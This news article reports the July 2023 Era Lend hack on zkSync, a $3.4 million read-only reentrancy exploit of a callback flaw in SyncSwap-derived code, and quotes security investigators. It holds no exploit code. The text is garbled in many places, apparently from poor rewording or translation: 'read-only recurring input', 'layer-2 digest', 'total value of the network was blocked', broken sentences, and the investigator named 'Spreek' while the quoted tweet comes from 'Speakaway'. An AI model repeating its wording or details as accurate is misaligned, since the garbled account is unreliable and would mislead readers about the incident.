Era Lend’s lending app on zkSync was hacked for $3.4 million worth of cryptocurrency, according to a July 25 report from blockchain security firm CertiK. The attacker used a “read-only attack” to exhaust the resources, which is a type of attack that interrupts a multi-step process and then causes it to continue after a malicious action is performed. Specifically, a “read-only” recurring input is one that does not update the state of the contract.
We see news about it @Era_Lend was exploited on zkSync
Total losses appear to be $3.4 million in a repeated read-only attack
See more below https://t.co/h8xrjccE5i
— CertiK Alert (@CertiKAlert) July 25, 2023
According to the report, the attacker withdrew the funds in two separate transactions using the externally owned account 0xf1D076c9Be4533086f967e14EE6aFf204D5ECE7a. They relied on a vulnerability in the “a_updateReserves callback function” to manipulate the contract to report old values that had not yet been updated.
Era Lend is a fork of the Syncswap project, and CertiK claimed that other Syncswap-based projects may also be vulnerable to the exploit.
On-chain sleuth and Twitter user Spreek said the Syncswap code allows the user to “fire and then call back before calling update_reserves”, causing the oracle to report incorrect values.
in syncswap LP tokens can be burned, then the callback before update_reserves is called. so the oracle uses the wrong reserve value to calculate the price, resulting in an inflated oracle price. pic.twitter.com/0U7Vu7BzJM
— Speakaway (@speakaway) July 25, 2023
Spreek also stated that the Era Lend team had acknowledged attack and suspended zkSync protocol contracts to prevent further abuse.
Another blockchain investigator, known on Twitter as Saul, said the attack had taken place disabled the USDC+ stablecoin, which is issued by the Overnight Finance protocol. According to Saul, the Overnight team acknowledged the revelations and also suspended their own contracts. More than $261,000, or 7.86% of the total value of the collateral backing the stablecoins, could have been lost.
In a June 7 blog post explanatory As read-only reentrancy attacks are carried out, pseudonymous blockchain investigator Officer’s Notes said that these vulnerabilities are difficult for auditors to detect because “Auditors and debuggers typically only look at entry points that modify state while looking for re-entry.”
To mitigate this problem, Officer’s Notes recommends that auditors use specialized software to help them find these vulnerabilities.
Era Lend runs on the zkSync network, which is a zero-knowledge Ethereum layer-2 digest. In April, the total value of the network was blocked reached more than $110 million. The developers of the network intend to do so create an ecosystem interoperable chains called “Hyperchains” by the end of the year.